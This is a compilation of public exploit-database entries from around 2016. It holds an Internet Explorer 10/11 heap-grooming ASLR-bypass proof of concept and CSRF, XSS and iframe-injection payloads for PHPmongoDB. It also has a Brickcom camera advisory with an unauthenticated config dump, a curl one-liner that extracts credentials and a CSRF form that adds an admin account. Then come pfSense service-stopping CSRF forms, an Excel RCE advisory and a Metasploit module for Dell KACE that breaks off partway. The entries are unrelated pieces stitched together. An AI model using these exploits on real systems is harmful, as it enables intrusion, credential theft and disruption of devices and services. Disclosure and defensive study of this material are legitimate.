DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->

<!DOCTYPE html>
<html>
<head>
    <title>IE 10-11 Windows 7 SP1 x86 - OOB Read ASLR Bypass PoC</title>
    <meta http-equiv="pragma" content="no-cache"/>
    <meta http-equiv="expires" content="0"/>
    <script type="text/javascript">
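        /**
         * Builds the text for a BSTR that will occupy exactly `size` bytes.
         *
         * `character` is doubled until it is at least `size` long, then cut
         * down so that the 4-byte header + UTF-16 body + 2-byte NUL terminator
         * add up to `size`.
         *
         * @param {string} character seed text; must be non-empty
         * @param {number} size target allocation size in bytes (e.g. 0x0A0)
         * @returns {string} (size - 6) / 2 UTF-16 code units of the repeated
         *   seed; '' when the seed is empty (the doubling loop could never
         *   terminate for an empty seed) or when size < 6
         */
        function createString(character, size) {
            // An empty seed never grows, so bail out instead of spinning forever.
            if (!character) {
                return '';
            }

            while (character.length < size) {
                character += character;
            }

            // BSTR structure
            // header  | unicode string     | NULL terminator
            // 4 bytes | sizeof(string) * 2 | 2 bytes
            return character.substr(0, (size - 6) / 2);
        }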

        /**
         * Extracts the Internet Explorer / Edge major version from the user agent.
         *
         * Three markers are tried in order: "MSIE" (IE <= 10), "Trident/" (IE 11,
         * whose version follows "rv:") and "Edge/". The first marker present in
         * the user agent wins and its version digits are read up to the next '.'.
         *
         * @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie
         * @returns {int | null} the major version, or null when no marker matches
         */
        function getInternetExplorerVersion() {
            var agent = window.navigator.userAgent;
            // [marker that identifies the browser, token preceding the digits,
            //  characters to skip from that token to reach the digits]
            var probes = [
                ['MSIE', 'MSIE', 5],     // "MSIE 10.0" -> skip "MSIE "
                ['Trident/', 'rv:', 3],  // "Trident/7.0; rv:11.0" -> skip "rv:"
                ['Edge/', 'Edge/', 5]    // "Edge/12.246" -> skip "Edge/"
            ];

            for (var p = 0; p < probes.length; p++) {
                if (agent.indexOf(probes[p][0]) > 0) {
                    var start = agent.indexOf(probes[p][1]);
                    var digits = agent.substring(start + probes[p][2], agent.indexOf('.', start));
                    return parseInt(digits, 10);
                }
            }
            return null;
        }

        /**
         * Leaks the base address of MSHTML.DLL via the CDOMStringDataList OOB read.
         *
         * Grooms the process heap with MsGestureEvent objects, punches holes,
         * drains Memory Protector's delayed frees, then fills the holes with
         * requiredFeatures strings whose parsing reads past the buffer into
         * the neighbouring MsGestureEvent. The VFTable pointer read from there,
         * minus the per-version offset, is the module base. On failure the page
         * reloads itself (side effect) until the heap lines up.
         *
         * @param offsetOfMSHTMLBaseAddress distance from the CDOMMSGestureEvent
         *   VFTable to the MSHTML.DLL base for the running IE build
         */
        function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) {
            // Step 1: Let's do some clean up
            CollectGarbage();

            var eventArray = new Array();
            var polyLineArray = new Array();
            var exploitSuccessful = false;

            // Step 2: As the target object is stored in Process Heap
            // instead of Isolated Heap, we can use any element that
            // is stored on Process Heap to spray the Heap.
            //
            // To create a predictable pattern on Heap, we spray using
            // "MsGestureEvent" and it's size is 0x0A0. We will use
            // this object to read the VFTable pointer.
            for (var i = 0; i < 0x1000; i++) {
                eventArray[i] = document.createEvent('MsGestureEvent');
            }

            // Step 3: Now we need to create a hole in the allocation
            // that we made earlier. The purpose of this hole is to
            // allocate the vulnerable buffer just before the Heap
            // chunk of "MsGestureEvent"
            // (every other slot of the first 0x500 is released, so holes
            // alternate with live events).
            for (i = 1; i < 0x500; i += 2) {
                eventArray[i] = null;
            }

            // Step 4: As Memory Protector is enabled by default on all
            // versions of IE, it will not allow the free of objects
            // instantly. So, we need to force free the memory due to
            // Delayed Frees.
            CollectGarbage2();

            // Step 5: Now, fill the hole that we created earlier. The
            // "requiredFeatures" property is allocated on OLEAUT32 Cache
            // Heap, old Plunger technique does not seems to work for me.
            // I have used a neat trick to bypass OLEAUT32 Cache Heap.
            for (i = 0; i < 0x250; i++) {
                polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');

                // Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap
                // (a same-sized throwaway attribute is set first).
                polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0));

                // Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap.
                // The value is all newlines -- the character whose handling
                // triggers the OOB read in InitFromString.
                polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0));

                // Step 8: As the whole exploitation depends on certain Heap
                // layout, thus, this is unreliable. But to overcome this
                // un-reliability, I'm reloading the page until, right Heap
                // Layout is achieved.
                //
                // This PoC is created for the vendor to acknowledge this bug,
                // hence reliability is not my concern at this moment. We can
                // make it more reliable, but let's leave it for later stage.
                //
                // Some heuristics to detect if Heap is in the right state.
                // Once we have determined the Heap state, we can apply some
                // more heuristics.
                if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) {
                    // Step 9: Read the Out of Bound memory
                    var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1));

                    // Step 10: Some more heuristics
                    // escape() renders each OOB UTF-16 unit as %uXXXX; after
                    // splitting on '%', slots [2] and [3] are the 2nd and 3rd
                    // units, joined higher-slot-first -- presumably a little-endian
                    // 32-bit pointer reassembly. Confirm against the heap layout.
                    var spitValue = OOBReadMemory.split('%');
                    var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', ''));
                    var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress;

                    // Step 11: Show the message to user
                    var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16);
                    message += '\n';
                    message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16);
                    alert(message);

                    // Step 12: Exploit successful
                    exploitSuccessful = true;
                    break;
                }
            }

            // Step 13: As stated earlier, this is a bit unreliable.
            // If the exploit has failed, reload the current page.
            // If reloading does not help, close the browser and
            // launch the exploit multiple times.
            if (!exploitSuccessful) {
                window.location.reload();
            }
        }

        /**
         * This function is used fill the wait list of the freed objects
         * and trigger Garbage Collection.
         */
        function CollectGarbage2() {
            // Microsoft implemented Memory Protector to mitigate
            // Use after Free vulnerabilities. The object protected
            // by Memory Protector won't be freed directly. Instead,
            // it will be put into a wait list which will be freed
            // when it reaches certain threshold (i.e 100,000 bytes).
            var video = new Array();

            // Allocate 250 video elements; at the 400 bytes per element
            // the author cites, that is exactly the 100,000-byte threshold
            // named above, so one pass should be enough to tip the list.
            //
            // Note: We are not using stack to store the references.
            // If we use stack to store the references, the memory
            // will never be freed during Mark and Reclaim operation
            for (var i = 0; i < 250; i++) {
                video[i] = document.createElement('video');
            }

            // Drop the only reference to the array so every element becomes
            // unreachable; Memory Protector queues them on the wait list
            // rather than freeing them immediately.
            video = null;

            // Reclaim the memory by triggering Garbage Collection.
            // CollectGarbage() is an IE-only global; this whole routine is
            // heap grooming and only makes sense inside Internet Explorer.
            CollectGarbage();
        }

        /**
         * This function is used to launch the exploitation by leaking
         * the base address of MSHTML.DLL.
         */
        function LaunchExploit() {
            // Distance from the leaked CDOMMSGestureEvent vftable pointer to
            // the MSHTML.DLL base, per supported IE major version. These are
            // build-specific: if the leaked base looks wrong, recompute
            // VFTableAddress - MSHTMLBaseAddress and update the table.
            var vftableOffsets = {
                11: 0x0002ebe8,
                10: 0x0000d270
            };

            // Number() mirrors the loose == comparison the version check used,
            // so string and numeric version values are treated alike.
            var ieVersion = getInternetExplorerVersion();
            var offsetOfMSHTMLBaseAddress = vftableOffsets[Number(ieVersion)];

            if (offsetOfMSHTMLBaseAddress === undefined) {
                alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)');
                return;
            }

            // Hand the version-specific offset to the leak routine.
            LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress);
        }
    </script>
</head>
<body onload='LaunchExploit();'>
</body>
</html>
            
#################################################################################################################################################
# Exploit Title: PHPmongoDB v1.0.0 - Multiple Vulnerabilities [CSRF | HTML (or Iframe) Injection | XSS (Reflected & Stored)]
# Date: 14.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmongodb.org
# Software Link: https://github.com/phpmongodb/phpmongodb
# Version: 1.0.0
#################################################################################################################################################

Introduction
PHPmongoDB is a web-based tool for administering MongoDB. Source:
http://www.phpmongodb.org

Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)


CSRF details:

#################################################################################################################################################

CSRF1

Create Database

<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Save"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>

#################################################################################################################################################

CSRF2

Drop Database

<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Drop"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>

#################################################################################################################################################

CSRF3

Create Collection

<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/CreateCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>


#################################################################################################################################################

CSRF4

Drop Collection

<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/DropCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>

#################################################################################################################################################

CSRF5

Execute Code

(The most serious of the CSRF issues: the forged request submits an
attacker-chosen "code" value — a MongoDB shell command in the example — for
execution through the victim's session, so the attacker is not limited to
creating or dropping objects.)

<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Server/Execute"
method="POST">
<input type="text" name="code" value="db.getCollectionNames()"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Execute Code"/>
</form>
</body>
</html>

#################################################################################################################################################

CSRF6

Logout

<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Login/Logout"
method="POST">
<input type="submit" value="Logout"/>
</form>
</body>
</html>

#################################################################################################################################################


HTML Injection details:
#################################################################################################################################################

HTML Injection1

URL
http://localhost/phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E

METHOD
Get

PARAMETER
URL

PAYLOAD
/"><iframe src=http://www.phpmongodb.org>

#################################################################################################################################################

HTML Injection2

URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E&db=local

METHOD
Get

PARAMETER
collection

PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E

#################################################################################################################################################

HTML Injection3

URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E

METHOD
Get

PARAMETER
db

PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E

#################################################################################################################################################

HTML Injection4 (Stored)

URL
http://localhost/phpmongodb/index.php

METHOD
Post

PARAMETER
collection

PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E

Request
POST /phpmongodb/index.php HTTP/1.1

collection=testcollection%253E%253Ciframe%2520src%253Dhttp%253A%252f%
252fwww.phpmongodb.org
%253E&size=&max=&load=Collection%2FCreateCollection&db=db&save=

#################################################################################################################################################



XSS details:
#################################################################################################################################################

XSS1 (Reflected)

URL
http://localhost/phpmongodb/index.php/%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

METHOD
Get

PARAMETER
URL

PAYLOAD
/"><script>alert(1)</script>

#################################################################################################################################################

XSS2 (Reflected)

URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253cscript%253ealert%25282%2529%253c%252fscript%253e&db=local

METHOD
Get

PARAMETER
collection

PAYLOAD
%253cscript%253ealert%25282%2529%253c%252fscript%253e

#################################################################################################################################################

XSS3 (Reflected)

URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253cscript%253ealert%25283%2529%253c%252fscript%253e

METHOD
Get

PARAMETER
db

PAYLOAD
%253cscript%253ealert%25283%2529%253c%252fscript%253e

#################################################################################################################################################

XSS4 (stored)

URL
http://localhost/phpmongodb/index.php

METHOD
Post

PARAMETER
collection

PAYLOAD
%253Cscript%253Ealert%25284%2529%253C%252fscript%253E

Request
POST /phpmongodb/index.php HTTP/1.1

collection=testcollection%253Cscript%253Ealert%25284%2529%253C%252fscript%253E&size=&max&load=Collection%2FCreateCollection&db=db&save=


#################################################################################################################################################

XSS5 (Stored)
http://localhost/phpmongodb/index.php?load=Server/Execute

METHOD
Post

PARAMETER
db

PAYLOAD
%253Cscript%253Ealert%25285%2529%253C%252fscript%253E


Request
POST /phpmongodb/index.php?load=Server/Execute HTTP/1.1

code=db.getCollectionNames%28%29&db=db%253Cscript%253Ealert%25285%2529%253C%252fscript%253E

#################################################################################################################################################
            
                         _ _ _       _
                        | | | |     | |
  ___  _ ____      _____| | | | __ _| |__  ___
 / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \
 \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/


Security Advisory
   2016-04-12
                www.orwelllabs.com
                  twt:@orwelllabs


                                   sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
                                   [+] surveillance is the business model
of the internet - OK!
                                   sm1thw@0rw3lll4bs:~/bb# echo $?
                                   6079




Advisory Information
====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Advisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes



          p4n0pt1c0n

I.   Insecure Direct Object Reference/Authentication Bypass
II.  Sensitive information in plaintext
III. Hard-coded Credentials
IV.  Cross-site scripting
V.   Basic Authentication
VI.  Cross-site Request Forgery




Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."

These products are used as video surveillance systems by customers in
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.

* notes:

- some of the affected firmware (see 'affected products') is very recent,
released only a few months before this advisory, and still vulnerable, so
this is a structural/legacy problem rather than an old-firmware one.

- sensitive information presented in this advisory are fake.



I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
      - syslog.dump


Path: Maintenance -> Configuration -> 'Export'

+ configfile.dump

An unauthenticated GET request to the script "configfile.dump", as follows:
   http://xxx.xxx.xxx.xxx/configfile.dump?action=get

or like this

   http://xxx.xxx.xxx.xxx/configfile.dump.backup
   http://xxx.xxx.xxx.xxx/configfile.dump.gz

or just
   http://xxx.xxx.xxx.xxx/configfile.dump

returns all camera settings

[..code_snip..]

   DeviceBasicInfo.firmwareVersion=v3.0.6.12
   DeviceBasicInfo.macAddress=00:00:00:00:00:00
   DeviceBasicInfo.sensorID=OV9X11
   DeviceBasicInfo.internalName=Brickcom
   DeviceBasicInfo.productName=Di-1092AX
   DeviceBasicInfo.displayName=CB-1092AX
   DeviceBasicInfo.modelNumber=XXX
   DeviceBasicInfo.companyName=Brickcom Corporation
   DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
   DeviceBasicInfo.companyUrl=www.brickcom.com
   DeviceBasicInfo.serialNumber=AXNB02B211111
   DeviceBasicInfo.skuType=LIT
   DeviceBasicInfo.ledIndicatorMode=1
   DeviceBasicInfo.minorFW=1
   DeviceBasicInfo.hardwareVersion=
   DeviceBasicInfo.PseudoPDseProdNum=P3301
   AudioDeviceSetting.muted=0

[..code_snip..]

and all credentials including the administrator account, like this:


UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss   <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User       <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss     <<<--- (common) user pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name      <<<--- (common) username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
  [snip]
BasicNetworkSetting.pppoe.password=                   <<<--- pppoe password
BasicNetworkSetting.pppoe.username=                   <<<--- pppoe username
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=                         <<<--- dyndns user
DDNSSetting.dyndns.password=                         <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=                         <<<--- and here...
DDNSSetting.tzodns.password=                         <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=                        <<<--- here
DDNSSetting.noipdns.password=                        <<<--- here
DDNSSetting.noipdns.hostname=
and many others...

- Path: System -> System Log -> 'Save to File'

+ syslog.dump

- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get

- Response:
[..code_snip..]

LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014

[..code_snip..]


Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -sf -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0" configfile.dump | awk -F. '{ print $4 }' || echo -e "[-] The target does not seem to be vulnerable, Mr. Robot! \n"

(-f makes curl fail on an HTTP error instead of saving the error page as
configfile.dump, so the "not vulnerable" branch fires cleanly; -F. sets the
field separator before the first line is split, whereas the original's FS="."
inside the action block only takes effect from the second matching line on,
which printed an empty line in place of the index field.)

IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show the index,
password, privilege level (1:admin) and username of the first account, like
this:

index=0
password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN

and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:

 "[-] The target does not seem to be vulnerable, Mr. Robot!"


II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are stored in plaintext.


III. Hard-coded Credentials
---------------------------
All configured accounts, with their plaintext passwords, are embedded in the
JavaScript of the page user_management_config.html; viewing the page source
is enough to read them:

view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html

(Note: these are the device's configured accounts rendered into the page,
i.e. credential disclosure in the HTML source rather than fixed factory
credentials; as stated above, the values shown in this advisory are fake.)

<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);

User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";

User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";


IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=


REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=


V. Basic Authentication
-----------------------
The device prompts the user for HTTP Basic authentication credentials.
If these are supplied, they travel over clear-text HTTP; the Base64 encoding
is trivially reversible and provides no confidentiality, so anyone on the
network path can recover them.


VI. Cross-site Request Forgery
------------------------------
# To add an administrative credential: "brickcom:brickcom"

> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2


<html>
  <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
  <body>
    <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="index" value="0" />
      <input type="hidden" name="username" value="brickcom" />
      <input type="hidden" name="password" value="brickcom" />
      <input type="hidden" name="privilege" value="1" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


# to remove this credential:

<html>
  <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
  <body>
    <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="username" value="brickcom" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


affected products
-----------------
(+) various products, including models:

  Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
  Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)

  Vandal Dome Cameras
  -------------------
  Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
  Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
  Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)

  Bullet Cameras
  --------------
  Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
  Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
  Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
  Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
  Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
  Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)


  Mini Dome Camera
  ----------------
  Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)


  Cube Camera
  -----------
  Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)


  Fixed Dome Camera
  -----------------
  Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)


Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.


Timeline
++++++++
2015-03-20  - Issues discovered
2015-03-30  - attempt to contact Vendor
2015-12-12  - attempt to assign CVE
2016-04-12  - No easy way to contact the vendor; (on Twitter) their last
tweet was 2011-01-31...
2016-04-14  - Full disclosure


About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.


-----BEGIN PGP PUBLIC KEY BLOCK-----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=IZYl
-----END PGP PUBLIC KEY BLOCK-----
            
# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery 
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps


1. Description

An attacker can coerce a logged-in victim's browser into issuing requests that start, stop or restart services on the firewall. The PoCs below are plain GET requests (the forms declare no method), so with the victim's session cookie attached automatically the same effect can presumably be triggered by any cross-site GET, e.g. an image or link, not only a submitted form.


2. Proof of Concept

Log in to the web console, for example http://192.168.0.1 (set at install time), and then open the following PoCs:


Start NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="startservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>


Stop NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



Restart NTPD service:

POC:
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="restartservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>

The service will automatically start/stop. 

Note: the ntpd service can be replaced with any service running on the firewall. For example, to stop the apinger (gateway monitoring daemon) service, use the following PoC:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="apinger" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



3. Solution:

Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
            
#######################################################################################

# Title: Microsoft Office Excel Out-of-Bounds Read Remote Code Execution
# Application: Microsoft Office Excel
# Affected Products: Microsoft Office Excel 2007,2010,2013,2016
# Software Link: https://products.office.com/en-ca/excel
# Date: April 12, 2016
# CVE: CVE-2016-0122 (MS16-042)
# Author: Sébastien Morin from COSIG
# Contact: https://twitter.com/COSIG_ (@COSIG_)
# Personal contact: https://smsecurity.net/; https://twitter.com/SebMorin1 (@SebMorin1)

#######################################################################################

===================
Introduction:
===================

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, Mac OS X, and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. It has been a very widely applied spreadsheet for these platforms, especially since version 5 in 1993, and it has replaced Lotus 1-2-3 as the industry standard for spreadsheets. Excel forms part of Microsoft Office.

(https://en.wikipedia.org/wiki/Microsoft_Excel)

#######################################################################################

===================
Report Timeline:
===================

2016-02-06: Sébastien Morin from COSIG reported the vulnerability to MSRC.
2016-02-16: MSRC confirmed the vulnerability.
2016-04-12: Microsoft fixed the issue (MS16-042).
2016-04-13: Advisory released.
#######################################################################################

===================
Technical details:
===================

This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file (.xlsm). An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.

#######################################################################################

==========
POC:
==========

https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39694.zip

#######################################################################################
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

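class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell KACE K1000 File Upload',
      'Description'    => %q{
          This module exploits a file upload vulnerability in Kace K1000
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
        which allows unauthenticated users to execute arbitrary commands
        under the context of the 'www' user.

        This module also abuses the 'KSudoClient::RunCommandWait' function
        to gain root privileges.

        This module has been tested successfully with Dell KACE K1000
        version 5.3.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => 'unix', # FreeBSD
      'Arch'           => ARCH_CMD,
      'Author'         =>
        [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          # 0x27 (') would terminate the single-quoted PHP string the payload
          # is embedded in (see #exploit).
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DisclosureDate' => 'Mar 7 2014'))
  end

  # Fingerprints the appliance from the custom X-DellKACE-* headers returned
  # by the unauthenticated upload endpoint and maps the reported version onto
  # the affected ranges quoted in the description.
  #
  # Returns one of Exploit::CheckCode::{Unknown,Safe,Detected,Vulnerable}.
  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    # A bare GET to the upload script yields a 500 on the appliance. The
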